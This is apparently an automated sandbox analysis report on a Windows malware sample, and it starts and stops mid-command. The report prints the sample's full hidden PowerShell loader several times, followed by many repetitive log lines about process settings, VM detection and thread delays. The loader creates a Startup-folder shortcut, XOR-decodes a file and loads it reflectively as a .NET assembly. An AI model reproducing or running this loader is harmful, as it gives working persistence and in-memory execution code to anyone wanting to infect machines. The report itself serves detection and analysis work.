-ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'Jump to behavior
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAEEA3356B push eax; retf 3_2_00007FFAEEA33579
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAEEA32953 pushad ; iretd 3_2_00007FFAEEA32961
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAEEA330CB push cs; retf 3_2_00007FFAEEA330DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAEEA33313 push ebx; retf 3_2_00007FFAEEA3335A

Boot Survival:

barindex
Powershell creates an autostart linkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnkJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnkJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4034Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4562Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5660Thread sleep count: 4034 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5660Thread sleep count: 4562 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5576Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: powershell.exe, 00000003.00000002.240068636.0000029B7F9C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000003.00000002.240068636.0000029B7F9C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000003.00000002.240068636.0000029B7F9C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000003.00000002.240068636.0000029B7F9C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 